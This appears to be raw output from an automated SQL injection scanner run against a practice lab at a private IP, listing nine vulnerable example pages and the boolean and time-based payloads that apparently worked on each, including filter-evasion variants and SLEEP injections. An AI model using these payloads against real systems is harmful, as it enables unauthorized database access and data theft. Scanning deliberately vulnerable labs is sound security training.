Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'67877'='67877
'	and	'10960'='10960
'	or	23636=23636#
'	and	'64666'='64667
Advice: 
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '	and	'67877'='67877
'	and	'10960'='10960
'	or	23636=23636#
'	and	'64666'='64667
Advice: 
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: 
Query: {'name': 'root'}
Payload: '/**/and/**/'13777'='13777
'/**/and/**/'59686'='59686
'/**/or/**/26601=26601#
'/**/and/**/'67717'='67718
Advice: 
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84521=84521
	and	11890=11890
	or	91786=91786#
	and	89761=89762
Advice: 
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84521=84521
	and	11890=11890
	or	91786=91786#
	and	89761=89762
Advice: 
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 	and	84521=84521
	and	11890=11890
	or	91786=91786#
	and	89761=89762
Advice: 
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: 
Query: {'id': '2'}
Payload: 
and
82852=82852

and
24850=24850

or
97730=97730#

and
13114=13115
Advice: 
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: 
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: 
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: 
---